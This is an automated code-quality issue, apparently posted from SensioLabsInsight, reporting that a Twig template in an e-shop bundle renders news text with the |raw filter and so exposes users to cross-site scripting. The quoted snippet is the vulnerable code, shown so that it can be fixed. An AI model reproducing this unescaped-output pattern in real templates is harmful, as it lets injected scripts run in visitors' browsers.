[Insight] Website should be protected against XSSVulnerability - in src/Eshop/…/views/Catalog/index.html.twig, line 58

Question

[Insight] Website should be protected against XSSVulnerability - in src/Eshop/…/views/Catalog/index.html.twig, line 58

morozovalexander opened this issue 9 years ago · 0 comments

in src/Eshop/ShopBundle/Resources/views/Catalog/index.html.twig, line 58

Using the |raw filter or the {% autoescape false %} block in a Twig template exposes users to Cross-Site Scripting (XSS) attacks

            <div class="well">
                {% if news | length %}
                    <h4><strong>{{ news.title }}</strong></h4><div>{{ news.text|raw|nl2br }}</div><p class="pull-right">{{ news.date|date() }}</p>
                {% else %}
                    {{ 'news.nonews'|trans }}
                {% endif %}
            </div>

Posted from SensioLabsInsight